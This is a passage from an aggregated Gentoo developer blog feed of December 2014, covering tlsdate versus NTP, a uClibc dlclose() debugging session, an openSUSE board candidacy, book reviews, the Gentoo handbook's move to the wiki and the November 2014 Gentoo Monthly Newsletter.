So the conclusion is obvious: NTP is insecure, you shouldn't use it. You should use tlsdate instead. Operating systems should replace ntpd or other NTP-based solutions with tlsdated (ChromeOS already does).

(I should point out that the authentication problems have nothing to do with the current vulnerabilities. These are buffer overflows and this can happen in every piece of software. Tlsdate seems pretty secure, it uses seccomp to make exploitability harder. But of course tlsdate can have security vulnerabilities, too.)

Update: Accuracy and TLS 1.3

This blog entry got much more publicity than I expected, I'd like to add a few comments on some feedback I got.

A number of people mentioned the lack of accuracy provided by tlsdate. The TLS timestamp is in seconds, adding some network latency you'll get a worst case inaccuracy of around 1 second, certainly less than two seconds. I can see that this is a problem for some special cases, however it's probably safe to say that for most average use cases an inaccuracy of less than two seconds does not matter. I'd prefer if we had a protocol that is both safe and as accurate as possible, but we don't. I think choosing the secure one is the better default choice.

Then some people pointed out that the timestamp of TLS will likely be removed in TLS 1.3. From a TLS perspective this makes sense. There are already TLS users that randomize the timestamp to avoid leaking the system time (e. g. tor). One of the biggest problems in TLS is that it is too complex so I think every change to remove unneccesary data is good.
For tlsdate this means very little in the short term. We're still struggling to get people to start using TLS 1.2. It will take a very long time until we can fully switch to TLS 1.3 (which will still take some time till it's ready). So for at least a couple of years tlsdate can be used with TLS 1.2.

I think both are valid points and they show that in the long term a better protocol would be desirable. Something like NTP, but with secure authentication. It should be possible to get both: Accuracy and security. With existing protocols and software we can only have either of these - and as said, I'd choose security by default.

I finally wanted to mention that the Linux Foundation is sponsoring some work to create a better NTP implementation and some code was just published. However it seems right now adding authentication to the NTP protocol is not part of their plans.

December 18, 2014
Michal Hrusecky a.k.a. miska (homepage, bugs)
Running for The Board (December 18, 2014, 00:04 UTC)

Hi everybody, openSUSE elections are just around the corner and I decided to step forward and run for the seat in The Board. For those who don’t know me and would like to know why consider me as an option, here is my platform.

Who am I?

I’m about 30 years old, live in Prague and I love openSUSE (and Gentoo ;-) ). SUSE 6.3 was my first Linux distribution, I went through som more and I actively joined the openSUSE community more than six years ago. I was for five years working for SUSE as openSUSE Boosters and package maintainer. I was also part of the Prague openSUSE Conference organization team. Nowadays I work for company called Eaton (in open source team), but I still love openSUSE, have plenty of friends in both SUSE and openSUSE, poke some packages from time to time and I’m spreading open source in general and openSUSE in particular wherever I go (we have few openSUSE servers at work now, yay).

What I see as a role of board and what I would like to achieve there?

I see the role of board as a supporter and caretaker. Board is here to do the boring stuff and to enable everybody else to make amazing things within the project. To encourage people to do new things, to smoother rough edges, remove obstacles, listen to the people and try to bring them together. Also if needed, defend the project from possible threats, but I don’t see any at the horizon currently :-)

What would I like to achieve? Wold domination? Probably not as I don’t think that the board is here to choose direction. But if you have a cunning and ethical plan how to do that, I think board should do everything possible to support you. But on more serious note, openSUSE as a distribution had a challenging year, went through some changes lately and I believe that thanks to the current board we managed to go through it quite well. But I alsi think there are more challenges in front of  us and I would like help to make our future path as smooth as possible.

Why vote for me?

Why vote for me especially if I don’t promise pink ponies and conquering the world? Well, I promise that I will do my best to support you and help project to move in whatever direction it wants. Even if it means pink ponies and conquering the world ;-) I always listen to the others and I’m trying to resolve everything peacefully. I’m almost always smiling and it’s hard to piss me off. So almost no matter what I’ll keep calm, patient and will try to resolve challenges peacefully and to satisfy all interested parties.

December 16, 2014
Anthony Basile a.k.a. blueness (homepage, bugs)

I pushed out another version of Lilblue Linux a few days ago but I don’t feel as good about this release as previous ones.  If you haven’t been following my posts, Lilblue is a fully featured amd64, hardened, XFCE4 desktop that uses uClibc instead of glibc as its standard C library.  The name is a bit misleading because Lilblue is Gentoo but departs from the mainstream in this one respect only.  In fact, I strive to make it as close to mainstream Gentoo as possible so that everything will “just work”.  I’ve been maintaining Lilblue for years as a way of pushing the limits of uClibc, which is mainly intended for embedded systems, to see where it breaks and fix or improve it.

As with all releases, there are always a few minor problems, little annoyances that are not exactly show stopper.  One minor oversight that I found after releasing was that I hadn’t configured smplayer correctly.  That’s the gui front end to mplayer that you’ll find on the toolbar on the bottom of the desktop. It works, just not out-of-the-box.  In the preferences, you need to switch from mplayer2 to mplayer and set the video out to x11.  I’ll add that to the build scripts to make sure its in the next release [1].  I’ve also been migrating away from gnome-centered applications which have been pulling in more and more bloat.  A couple of releases ago I switched from gnome-terminal to xfce4-terminal, and for this release, I finally made the leap from epiphany to midori as the main browser.  I like midori better although it isn’t as popular as epiphany.  I hope others approve of the choice.

But there is one issue I hit which is serious.  It seems with every release I hit at least one of those.  This time it was in uClibc’s implementation of dlclose().  Along with dlopen() and dlsym(), this is how shared objects can be loaded into a running program during execution rather than at load time.  This is probably more familiar to people as “plugins” which are just shared objects loaded while the program is running.  When building the latest Lilblue image, gnome-base/librsvg segfaulted while running gdk-pixbuf-query-loaders [2].  The later links against glib and calls g_module_open() and g_module_close() on many shared objects as it constructs a cache of of loadable objects.  g_module_{open,close} are just glib’s wrappers to dlopen() and dlclose() on systems that provide them, like Linux.  A preliminary backtrace obtained by running gdb on `/usr/bin/gdk-pixbuf-query-loaders ./libpixbufloader-svg.la` pointed to the segfault happening in gcc’s __deregister_frame_info() in unwind-dw2-fde.c, which didn’t sound right.  I rebuilt the entire system with CFLAGS+=”-fno-omit-frame-pointer -O1 -ggdb” and turned on uClibc’s SUPPORT_LD_DEBUG=y, which emits debugging info to stderr when running with LD_DEBUG=y, and DODEBUG=y which prevents symbol stripping in uClibc’s libraries.  A more complete backtrace gave:

Program received signal SIGSEGV, Segmentation fault.
__deregister_frame_info (begin=0x7ffff22d96e0) at /var/tmp/portage/sys-devel/gcc-4.8.3/work/gcc-4.8.3/libgcc/unwind-dw2-fde.c:222
222 /var/tmp/portage/sys-devel/gcc-4.8.3/work/gcc-4.8.3/libgcc/unwind-dw2-fde.c: No such file or directory.
(gdb) bt
#0 __deregister_frame_info (begin=0x7ffff22d96e0) at /var/tmp/portage/sys-devel/gcc-4.8.3/work/gcc-4.8.3/libgcc/unwind-dw2-fde.c:222
#1 0x00007ffff22c281e in __do_global_dtors_aux () from /lib/libbz2.so.1
#2 0x0000555555770da0 in ?? ()
#3 0x0000555555770da0 in ?? ()
#4 0x00007fffffffdde0 in ?? ()
#5 0x00007ffff22d8a2f in _fini () from /lib/libbz2.so.1
#6 0x00007fffffffdde0 in ?? ()
#7 0x00007ffff6f8018d in do_dlclose (vhandle=0x7ffff764a420 <__malloc_lock>, need_fini=32767) at ldso/libdl/libdl.c:860
Backtrace stopped: previous frame inner to this frame (corrupt stack?)

The problem occurred when running the global destructors in dlclose()-ing libbz2.so.1.  Line 860 of libdl.c has DL_CALL_FUNC_AT_ADDR (dl_elf_fini, tpnt->loadaddr, (int (*)(void))); which is a macro that calls a function at address dl_elf_fini with signature int(*)(void).  If you’re not familiar with ctor’s and dtor’s, these are the global constructors/destructors whose code lives in the .ctor and .dtor sections of an ELF object which you see when doing readelf -S <obj>.  The ctors are run when a library is first linked or opened via dlopen() and similarly the dtors are run when dlclose()-ing.  Here’s some code to demonstrate this:

# Makefile
all: tmp.so test
tmp.o: tmp.c
        gcc -fPIC -c $^
tmp.so: tmp.o
        gcc -shared -Wl,-soname,$@ -o $@ $
test: test-dlopen.c
        gcc -o $@ $^ -ldl
clean:
        rm -f *.so *.o test
// tmp.c
#include <stdio.h>

void my_init() __attribute__ ((constructor));
void my_fini() __attribute__ ((destructor));

void my_init() { printf("Global initialization!\n"); }
void my_fini() { printf("Global cleanup!\n"); }
void doit() { printf("Doing it!\n" ; }
// test-dlopen.c
// This has very bad error handling, sacrificed for readability.
#include <stdio.h>
#include <dlfcn.h>

int main() {
        int (*mydoit)();
        void *handle = NULL;

        handle = dlopen("./tmp.so", RTLD_LAZY);
        mydoit = dlsym(handle, "doit");
        mydoit();
        dlclose(handle);

        return 0;
}

When run, this code gives:

# ./test 
Global initialization!
Doing it!
Global cleanup!

So, my_init() is run on dlopen() and my_fini() is run on dlclose().  Basically, upon dlopen()-ing a shared object as you would a plugin, the library is first mmap()-ed into the process’s address space using the PT_LOAD addresses which you can see with readelf -l <obj>.  Then, one walks through all the global constructors and runs them.  Upon dlclose()-ing the opposite process is done.  One first walks through the global destructors and runs them, and then one munmap()-s the same mappings.

Figuring I wasn’t the only person to see a problem here, I googled and found that Nathan Copa of Alpine Linux hit a similar problem [3] back when Alpine used to use uClibc — it now uses musl.  He identified a problematic commit and I wrote a patch which would retain the new behavior introduced by that commit upon setting an environment variable NEW_START, but would otherwise revert to the old behavior if NEW_START is unset.  I also added some extra diagnostics to LD_DEBUG to better see what was going on.  I’ll add my patch to a comment below, but the gist of it is that it toggles between the old and new way of calculating the size of the munmap()-ings by subtracting an end and start address.  The old behavior used a mapaddr for the start address that is totally wrong and basically causes every munmap()-ing to fail with EINVAL.  This is corrected by the commit as a simple strace -e trace=munmap shows.

My results when running with LD_DEBUG=1 were interesting to say the least.  With the old behavior, the segfault was gone:

# LD_DEBUG=1 /usr/bin//gdk-pixbuf-query-loaders libpixbufloader-svg.la
...
do_dlclose():859: running dtors for library /lib/libbz2.so.1 at 0x7f26bcf39a26
do_dlclose():864: unmapping: /lib/libbz2.so.1
do_dlclose():869: before new start = 0xffffffffffffffff
do_dlclose():877: during new start = (nil), vaddr = (nil), type = 1
do_dlclose():877: during new start = (nil), vaddr = 0x219c90, type = 1
do_dlclose():881: after new start = (nil)
do_dlclose():987: new start = (nil)
do_dlclose():991: old start = 0x7f26bcf22000
do_dlclose():994: dlclose using old start
do_dlclose():998: end = 0x21b000
do_dlclose():1013: removing loaded_modules: /lib/libbz2.so.1
do_dlclose():1031: removing symbol_tables: /lib/libbz2.so.1
...

Of course, all of the munmap()-ings failed.  The dtors were run, but no shared object got unmapped.  When running the code with the correct value of start, I got:

# NEW_START=1 LD_DEBUG=1 /usr/bin//gdk-pixbuf-query-loaders libpixbufloader-svg.la
...
do_dlclose():859: running dtors for library /lib/libbz2.so.1 at 0x7f5df192ba26
Segmentation fault

What’s interesting here is that the segfault occurs at  DL_CALL_FUNC_AT_ADDR which is before the munmap()-ing and so before any affect that the new value of start should have! This seems utterly mysterious until you realize that there is a whole set of dlopens/dlcloses as gdk-pixbuf-query-loader does its job — I counted 40 in all!  This is as far as I’ve gotten narrowing down this mystery, but I suspect some previous munmap()-ing is breaking the the dtors for libbz2.so.1 and when the call is made to that address, its no longer valid leading to the segfault.

Rich Felker,  aka dalias, the developer of musl, made an interesting comment to me in IRC when I told him about this issue.  He said that the unmappings are dangerous and that musl actually doesn’t do them.  For now, I’ve intentionally left the unmappings in uClibc’s dlclose() “broken” in the latest release of Lilblue, so you can’t hit this bug, but for the next release I’m going to look carefully at what glibc and musl do and try to get this fix upstream.  As I said when I started this post, I’m not totally happy with this release because I didn’t nail the issue, I just implemented a workaround.  Any hits would be much appreciated!

[1] The build scripts can be found in the releng repository at git://git.overlays.gentoo.org/proj/releng.git under tools-uclibc/desktop.  The scripts begin with a <a href=”http://distfiles.gentoo.org/releases/amd64/autobuilds/current-stage3-amd64-uclibc-hardened/”>hardened amd64 uclibc stage3</a> tarball and build up the desktop.

[2] The purpose of librsvg and gdk-pixbuf is not essential for the problem with dlclose(), but for completeness We state them here: librsvg is a library for rendering scalable vector graphics and gdk-pixbuf is an image loading library for gtk+.  gdk-pixbuf-query-loaders reads a libtool .la file and generates cache of loadable shared objects to be consumed by gdk-pixbuf.

[3] See  http://lists.uclibc.org/pipermail/uclibc/2012-October/047059.html. He suggested that the following commit was doing evil things: http://git.uclibc.org/uClibc/commit/ldso?h=0.9.33&id=9b42da7d0558884e2a3cc9a8674ccfc752369610

December 15, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)

Nokia 6230iYesterday I deleted all the remaining data on my old Nokia 6230i phone with the intent to give it away. It was my last feature phone (i. e. non-smartphone). My first feature phone was an 5130 in the late 90s. It made me think a bit about technology development.

I remember that at some point when I was a kid I asked myself if there are transportable phones. I was told they don't exist (which was not exactly true, but it's safe to say that they weren't widely available). Feature phones were nonexistent when I started to care about tech gadgets and today they're obsolete. (Some might argue that smartphones are the new mobile phones, but I don't think that's accurate. Essentially I think the name smartphone is misleading, because they are multi function devices where the phone functionality is just one – and hardly the most important one.)

I considered whether I should keep it in case my current smartphone breaks or gets lost so I have a quick replacement. However then I thought it would probably not do much good and decided it can go away as long as there are still people who would want to use it (the point where I could sell it has already passed). The reason is that the phone functionality is probably one of the lesser important ones of my smartphone and a feature phone wouldn't do much to help in case I loose it.

Of course feature phones are not the only tech gadgets that raised and became obsolete during my lifetime. CD-ROM drives, MP3 players, Modems, … I recently saw a documetary that was called “80s greatest gadgets” (this seems to be on Youtube, but unfortunately not available depending on your geolocation). I found it striking that almost every device they mentioned can be replaced with a smartphone today.

Something I wondered was what my own expectations of tech development were in the past. Surprisingly I couldn't remember that many. I would really be interested how I would've predicted tech development let's say 10 or 15 years ago and compare it to what really happened. The few things I can remember is that when I first heared about 3D printers I had high hopes (I haven't seen them come true until now) and that I always felt free software will become the norm (which in large parts it did, but certainly not in the way I expected). I'm pretty sure I didn't expected social media and I'm unsure about smartphones.

As I feel it's unfortunate I don't remember what I had expected in the past I thought I could write down some expectations now. I feel drone delivery will likely have an important impact in the upcoming years and push the area of online shopping to a whole new level. I expect the whole area that's today called “sharing economy” to rise and probably crash into much more areas. And I think that at some point robot technology will probably enter our everyday life. Admittedly none of this is completely unexpected but that's not the point.

If you have some interesting thoughts what tech we'll see in the upcoming years feel free to leave a comment.

Image from Rudolf Stricker / Wikimedia Commons

Sebastian Pipping a.k.a. sping (homepage, bugs)

Julian Treasure: How to speak so that people want to listen

December 14, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)
Handbooks moved (December 14, 2014, 12:42 UTC)

Yesterday the move of the Gentoo Wiki for the Gentoo handbooks (whose most important part are the installation instructions for the various supported architectures) has been concluded, with a last-minute addition being the one-page views so that users who want to can view the installation instructions completely within one view.

Because we use lots of transclusions (i.e. including different wiki articles inside another article) to support a common documentation base for the various architectures, I did hit a limit that prevented me from creating a single-page for the entire handbook (i.e. “Installing Gentoo Linux”, “Working with Gentoo”, “Working with portage” and “Network configuration” together), but I could settle with one page per part. I think that matches most of the use cases.

With the move now done, it is time to start tackling the various bugs that were reported against the handbook, as well as initiate improvements where needed.

I did make a (probably more – but this one is fresh in my memory) mistake in the move though. I had to do a lot of the following:

<noinclude><translate></noinclude>
...
<noinclude></translate></noinclude>

Without this, transcluded parts would suddenly show the translation tags as regular text. Only afterwards (I’m talking about more than 400 different pages) did I read that I should transclude the /en pages (like Handbook:Parts/Installation/About/en instead of Handbook:Parts/Installation/About) as those do not have the translation specifics in them. Sigh.

December 13, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
A short list of fiction books I enjoyed (December 13, 2014, 16:18 UTC)

I promised in the previous review a few more reviews for the month, especially as Christmas gifts for geeks. I decided to publish this group-review of titles, as I don't think it would have served anybody to post separate book reviews for all of these. I would also suggest you take a look at my previous reviews so that you can find more ideas for new books to read.

Let's start with a new book by a well-known author: The Ocean at the End of the Lane by Neil Gaiman is, as it's usual with him, difficult to nail (ah-ha) to a genre quickly. It starts off as the story of a kid's youth but builds up to… quite something. I have listened to the audiobook version rather than the book, and as it started it seemed something perfect to make me sleep well, but then again it mixed with my own dreams to form something at the same time scary and full of warmth.

It's common to say that it's the journey, not the destination, that is important, and I find that is a very good description of what I like in books. And in the case of Gaiman's book, this is more true than ever. I was not looking forward for it to end, not because it's a bad ending (even though it did upset me a bit) but because I really wanted to stay in that magical world of the Ocean at the end of the lane.

Next up, two series from an author who's also a friend: Michael McCloskey who writes both fantasy and scifi — I have yet to start on his fantasy series, but I fell in love with his scifi writing with Trilisk Ruins. I think it might be worth retelling the story of how I found out about it, even though it is a bit embarrassing: for a while I was an user on OkCupid – so sue me, it feels lonely sometimes – and while I did not end up meeting anybody out of there, my interest was picked by an ad on one of the pages: it was part of the cover of Trilisk Ruins but with no text on it. I thought it was going to be some kind of game, instead it was a much more intriguing book.

Michael's secret is in talking about a future that may be far off, but that is, well, feasible. It's not the dystopia painted by most scifi books I've read or skimmed through recently, although it's not a perfect future — it is, after all, the same as now. And technology is not just thrown up from a future far away that we can count on it as magic, nor it is just an extension of today's. It is a projection of it in a future: the Links are technologies that while not existing now, and not having a clearly-defined path to get to them, wouldn't be too far fetched to be existing.

Parker Interstellar Travels – that's the name of the series starting with Trilisk Ruins – is mostly lighthearted, even though dark at times. It reads quickly, once you get past the first chapter or two, as it jumps straight into an unknown world, so you may be stunned by it for a moment. But I would suggest you to brace yourself and keep going, it's fully worth it!

There is a second series by Michael, but in this case an already-closed trilogy, Synchronicity, starting with Insidious, which is set in the same universe and future, but it takes a quite different approach: it's definitely darker and edgier, and it would appeal to many of the geeks who are, as I write, busy reading and discussing potential AI problems. I have a feeling that it would have been similar in the '60s-'70s after 2001 was released.

In this series, the focus is more on the military, rather than the individuals, and their use, and fear, of AIs. As I noted it is darker, and it's less action-driven than PIT, but it does make up for it in introspection, so depending on what your cup of tea is, you may chose between the two.

The fourth entry in this collection is something that arrived through Samsung's Amazon deals. Interestingly I already had an audiobook by the same author – B.V. Larson – through some Audible giveaway but I have not listened to it yet. Instead I read Technomancer in just a week or so, and it was quite interesting.

Rather than future, Larson goes for current time, but in a quite fictionalized setting. There's a bit of cliché painting of not one, but two women in the book, but it does not seem to be as endemic as in other books I've read recently. It's a quick-bite read but it's also the start of a series so if you're looking for something that does not end right away you may consider it.

To finish this up, I'll go back to an author that I reviewed before: Nick Harkaway, already author of The Gone-Away World, which is sill one of my favourite modern books. While I have not read yet Tigeman which was on this year's shortlist for the Goodreads Awards, last year I read Angelmaker which is in a lot of ways similar to The Gone-Away World, but different. His characters once again are fully built up even when they are cows, and the story makes you want to dive into that world, flawed and sometimes scary as it is.

Have fun, and good reads this holiday season!

December 12, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)
Gentoo Handbooks almost moved to wiki (December 12, 2014, 15:35 UTC)

Content-wise, the move is done. I’ve done a few checks on the content to see if the structure still holds, translations are enabled on all pages, the use of partitions is sufficiently consistent for each architecture, and so on. The result can be seen on the gentoo handbook main page, from which the various architectural handbooks are linked.

I sent a sort-of announcement to the gentoo-project mailinglist (which also includes the motivation of the move). If there are no objections, I will update the current handbooks to link to the wiki ones, as well as update the links on the website (and in wiki articles) to point to the wiki.

Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Gentoo mailing lists down (December 12, 2014, 00:09 UTC)

Since yesterday the host running all Gentoo mailing lists is down. So far there is no information yet available on the nature of the problem. Please check the Gentoo Infrastructure status page, http://infra-status.gentoo.org/, for updates.

[Edit: All fixed.]

This public service announcement has been brought to you by non-infra Andreas.

December 11, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Book Review: Getting More (December 11, 2014, 21:19 UTC)

It has been a while since I wrote my last book review and it was not exactly a great one, so I'll try to improve on this by writing a few reviews over the next month or so. After all what better gift for geeks than books?

I have had the pleasure to read Getting More last October, as part of a work training. It's a book about negotiation, and makes a point multiple times to detach that from the idea of it being manipulation, even though it's probably up to you to see whether the distinction is clear enough for you. The author, Prof. Stuart Diamond, runs a negotiation course at Wharton, in Pennsylvania, and got famous with this.

I was expecting the book to be hogwash, as many other business books, and especially so as many materials I've been given before at courses (before my current job though). Turned out that the book is not bad at all and I actually found it enjoyable, even though a bit repetitive — but repetita iuvant as they say; the repetition is there to make you see the point, not just for the sake of being there.

The main objective of the book is to provide you with process and tools to use during negotiation, big-time business deals and everyday transactions alike. It also includes example on how to use this with your significant other and children, but I'll admit I just skipped over them altogether as they are not useful to me (I'm single and I don't even see my nephew enough to care about dealing with children.)

It was a very interesting read to me because, while I knew I'm not exactly a cold-minded person especially when frustrated, I found that some of the tools described I've been using, for a long time, without even knowing about their existence. For example, when I interviewed for my current job, my first on-site interviewer arrived with a NERV sticker on his laptop — we spent a few minutes talking about anime, and not only that reassured me a lot about the day, – you have no idea how stressed I was, as I even caught a fever the day before the interview! – it also built an "instantaneous" connection with someone who did indeed become a colleague. I would think it might have added to his patience for my thicker than usual accent that day, too.

Between anecdotes and explanations, the book has another underlying theme: be real. This is the main point of difference between negotiation and manipulation as seen from the book. In the more mundane case of dealing with stores, hotels and airlines, you have two main examples of using the techniques, to get compensated for something negative that happened, whether or not it was in control of the other party, and otherwise to ask penalties waived when you did something incorrect, unintentionally. It would be tempted to cause something negative and ask for compensation even if everything was perfect — that would be manipulation, and it's unlikely to work very well unless you're a good -actor- liar, and rather makes it worse for the rest of the world.

The book invites you to keep exercising the tools daily — I have been trying but it's definitely not easy especially if you're not an extrovert by nature. It takes practice and, especially at the beginning, more time than it would be worth: arguing half an hour for a fifteen euro discount somewhere is not really worth it to me, but on the other hand practice makes perfect and the processes to apply for small and big transactions the same. I have indeed been able to get some ~$100 back at the Holiday Inn I've stayed at in San Francisco.

I have got my set of reserves on using the methods described on the book – it sometimes feels manipulative and relying on implicit privilege – but on the other hand, Prof. Diamond points out multiple time that the methods works best when both parties know about them, so spreading the word about the book is a good idea, and telling people explicitly what you're doing is the best strategy.

Indeed, I felt that I would have gotten better from Tesco just last week, if they had read the book and applied the same methods. A delivery was missed, and that was fine, but then the store went incommunicado for over ten hours instead of calling me right away to reschedule, and the guy who called me lied on the order going to be new the day after. They gave me some €25 back straight on the card — which is okay for me, but it was not really in their best interest, as I could have walked away with the money and gone to a different store. I asked them if they could offer me some months of their DeliverySaver (think Amazon Prime for groceries) for free.

Yes, the DeliverySaver subscription would have had a much higher value (€7.5/month), but it would be actually cheaper to them (as I live in an apartment complex, that they delivery to daily anyway, the delivery costs are much lower than that), and it would have "forced" me to come back to them, rather than going to a competitor such as SuperValu. As it turns out, I've decided to stick with Tesco, mostly because I have their credit card and it is thus still convenient to stay a customer. But I do think they could have made a better deal for themselves.

At any rate, the book is worth a read and the techniques are not completely worthless, even though difficult to pull off without being a jerk. It requires knowing a lot about a system to do so, but again this is something that is up to the people reading the book.

December 10, 2014
Gentoo Monthly Newsletter: November 2014 (December 10, 2014, 20:00 UTC)

Gentoo News

Council News

The Gentoo Council addressed a few miscellaneous matters this month.

The first concerned tinderbox reports to bugs. There was a bit of a back-and-forth in bugzilla with a  dispute over whether bugs generated from tinderbox runs that contained logs attached as URLs instead of as files could be closed as INVALID. Normally the use of URLs is discouraged to improve the long-term usability of the bugs. Since efforts were already underway to try to automatically convert linked logs into attached logs it was felt that closing bugs as INVALID was counterproductive.

There was also a proposal to implement a “future.eclass” which would make EAPI6 features available to EAPI5 ebuilds early. In general the Council decided that this was not a good thing to implement in the main tree as it would mean supporting two different implementations of some of the EAPI6 features, which could potentially diverge and cause confusion. Instead it would be preferable to focus on migrating packages to use EAPI6. The Council did encourage using mechanisms like this to do testing in overlays/etc if it was for the purpose of improving future EAPIs, but that this shouldn’t be something done in “production.”

Several other items came up with no action this month. There was a proposal to allow die withing subshells in EAPI6, but this had not received list discussion and the Council has been requiring this to ensure that all developers are able to properly vet significant changes. The remaining items were follow-ups from previous months which are being tracked but which have not had enough development to
act on yet.

Gentoo Developer Moves

Summary

Gentoo is made up of 244 active developers, of which 40 are currently away.
Gentoo has recruited a total of 805 developers since its inception.

Changes

  • Matthias Maier (tamiko) joined the Science team
  • Andrew Savchenko (bircoph) joined the Science, Mathematics and Physics team
  • Jason Zaman (perfinion) joined the Hardened, Integrity and SElinux teams
  • Aaron Swenson (titanofold) joined the Perl team
  • Patrice Clement (monsieurp) joined the Perl team
  • Tom Wijsman (tomwij) left the bug-wranglers, dotnet, kernel, portage, QA and proxy-maintainers teams

Additions

Portage

This section summarizes the current state of the Gentoo ebuild tree.

Architectures 45
Categories 163
Packages 17849
Ebuilds 37661
Architecture Stable Testing Total % of Packages
alpha 3536 674 4210 23.59%
amd64 10838 6521 17359 97.25%
amd64-fbsd 0 1584 1584 8.87%
arm 2642 1848 4490 25.16%
arm64 549 64 613 3.43%
hppa 3076 529 3605 20.20%
ia64 3093 697 3790 21.23%
m68k 605 118 723 4.05%
mips 0 2422 2422 13.57%
ppc 6741 2549 9290 52.05%
ppc64 4295 1048 5343 29.93%
s390 1410 404 1814 10.16%
sh 1537 524 2061 11.55%
sparc 4033 980 5013 28.09%
sparc-fbsd 0 319 319 1.79%
x86 11483 5448 16931 94.86%
x86-fbsd 0 3205 3205 17.96%

gmn-portage-stats-2014-12

Security

The following GLSAs have been released by the Security Team

GLSA Package Description Bug
201411-11 net-proxy/squid Squid: Multiple vulnerabilities 504176
201411-10 net-misc/asterisk Asterisk: Multiple Vulnerabilities 523216
201411-09 app-admin/ansible Ansible: Privilege escalation 516564
201411-08 net-wireless/aircrack-ng Aircrack-ng: User-assisted execution of arbitrary code 528132
201411-07 net-misc/openswan Openswan: Denial of Service 499870
201411-06 www-plugins/adobe-flash Adobe Flash Player: Multiple vulnerabilities 525430
201411-05 net-misc/wget GNU Wget: Arbitrary code execution 527056
201411-04 dev-lang/php PHP: Multiple vulnerabilities 525960
201411-03 net-misc/tigervnc TigerVNC: User-assisted execution of arbitrary code 505170
201411-02 dev-db/mysql (and 1 more) MySQL, MariaDB: Multiple vulnerabilities 525504
201411-01 media-video/vlc VLC: Multiple vulnerabilities 279340

Package Removals/Additions

Removals

Package Developer Date
dev-php/adodb-ext grknight 01 Nov 2014
dev-php/eaccelerator grknight 01 Nov 2014
dev-php/pecl-apc grknight 01 Nov 2014
dev-php/pecl-id3 grknight 01 Nov 2014
dev-php/pecl-mogilefs grknight 01 Nov 2014
dev-php/pecl-sca_sdo grknight 01 Nov 2014
app-text/pastebin dilfridge 02 Nov 2014
sys-devel/libperl dilfridge 08 Nov 2014
dev-perl/Lucene dilfridge 08 Nov 2014
razorqt-base/libqtxdg yngwin 08 Nov 2014
virtual/perl-Version-Requirements dilfridge 08 Nov 2014
perl-core/Version-Requirements dilfridge 08 Nov 2014
dev-python/python-exec mgorny 08 Nov 2014
sys-devel/bfin-toolchain vapier 08 Nov 2014
dev-python/gns3-gui idella4 09 Nov 2014
dev-python/sparqlwrapper idella4 09 Nov 2014
app-accessibility/gnome-mag pacho 13 Nov 2014
app-accessibility/gnome-speech pacho 13 Nov 2014
app-accessibility/gok pacho 13 Nov 2014
app-admin/gnome-system-tools pacho 13 Nov 2014
app-admin/pessulus pacho 13 Nov 2014
app-admin/sabayon pacho 13 Nov 2014
app-crypt/seahorse-plugins pacho 13 Nov 2014
app-pda/gnome-pilot pacho 13 Nov 2014
app-pda/gnome-pilot-conduits pacho 13 Nov 2014
dev-cpp/libgdamm pacho 13 Nov 2014
dev-cpp/libpanelappletmm pacho 13 Nov 2014
dev-python/brasero-python pacho 13 Nov 2014
dev-python/bug-buddy-python pacho 13 Nov 2014
dev-python/evince-python pacho 13 Nov 2014
dev-python/evolution-python pacho 13 Nov 2014
dev-python/gnome-applets-python pacho 13 Nov 2014
dev-python/gnome-desktop-python pacho 13 Nov 2014
dev-python/gnome-media-python pacho 13 Nov 2014
dev-python/libgda-python pacho 13 Nov 2014
dev-python/libgksu-python pacho 13 Nov 2014
dev-python/libgnomeprint-python pacho 13 Nov 2014
dev-python/libgtop-python pacho 13 Nov 2014
dev-python/totem-python pacho 13 Nov 2014
gnome-base/gnome-applets pacho 13 Nov 2014
gnome-base/gnome-fallback pacho 13 Nov 2014
gnome-base/gnome-panel pacho 13 Nov 2014
app-accessibility/morseall pacho 13 Nov 2014
app-accessibility/java-access-bridge pacho 13 Nov 2014
gnome-extra/libgail-gnome pacho 13 Nov 2014
app-accessibility/dasher pacho 13 Nov 2014
gnome-extra/bug-buddy pacho 13 Nov 2014
gnome-extra/deskbar-applet pacho 13 Nov 2014
gnome-extra/evolution-exchange pacho 13 Nov 2014
gnome-extra/evolution-webcal pacho 13 Nov 2014
gnome-extra/fast-user-switch-applet pacho 13 Nov 2014
gnome-extra/gcalctool pacho 13 Nov 2014
gnome-extra/gnome-audio pacho 13 Nov 2014
gnome-extra/gnome-games-extra-data pacho 13 Nov 2014
gnome-extra/gnome-games pacho 13 Nov 2014
gnome-extra/gnome-media pacho 13 Nov 2014
gnome-extra/gnome-screensaver pacho 13 Nov 2014
gnome-extra/gnome-swallow pacho 13 Nov 2014
gnome-extra/hamster-applet pacho 13 Nov 2014
gnome-extra/lock-keys-applet pacho 13 Nov 2014
gnome-extra/nautilus-open-terminal pacho 13 Nov 2014
gnome-extra/panflute pacho 13 Nov 2014
gnome-extra/sensors-applet pacho 13 Nov 2014
gnome-extra/file-browser-applet pacho 13 Nov 2014
gnome-extra/gnome-hdaps-applet pacho 13 Nov 2014
media-gfx/byzanz pacho 13 Nov 2014
net-analyzer/gnome-netstatus pacho 13 Nov 2014
net-analyzer/netspeed_applet pacho 13 Nov 2014
x11-misc/glunarclock pacho 13 Nov 2014
gnome-extra/swfdec-gnome pacho 13 Nov 2014
gnome-extra/tasks pacho 13 Nov 2014
media-gfx/shared-color-profiles pacho 13 Nov 2014
net-libs/gupnp-vala pacho 13 Nov 2014
media-libs/swfdec pacho 13 Nov 2014
net-libs/farsight2 pacho 13 Nov 2014
net-libs/libepc pacho 13 Nov 2014
net-misc/drivel pacho 13 Nov 2014
net-misc/blogtk pacho 13 Nov 2014
net-misc/gnome-blog pacho 13 Nov 2014
net-misc/tsclient pacho 13 Nov 2014
www-client/epiphany-extensions pacho 13 Nov 2014
www-plugins/swfdec-mozilla pacho 13 Nov 2014
x11-themes/gnome-themes pacho 13 Nov 2014
x11-themes/gnome-themes-extras pacho 13 Nov 2014
x11-themes/gtk-engines-cleanice pacho 13 Nov 2014
x11-themes/gtk-engines-dwerg pacho 13 Nov 2014
x11-plugins/wmlife pacho 13 Nov 2014
dev-dotnet/gtkhtml-sharp pacho 13 Nov 2014
dev-util/mono-tools pacho 13 Nov 2014
net-libs/telepathy-farsight pacho 13 Nov 2014
x11-themes/gdm-themes pacho 13 Nov 2014
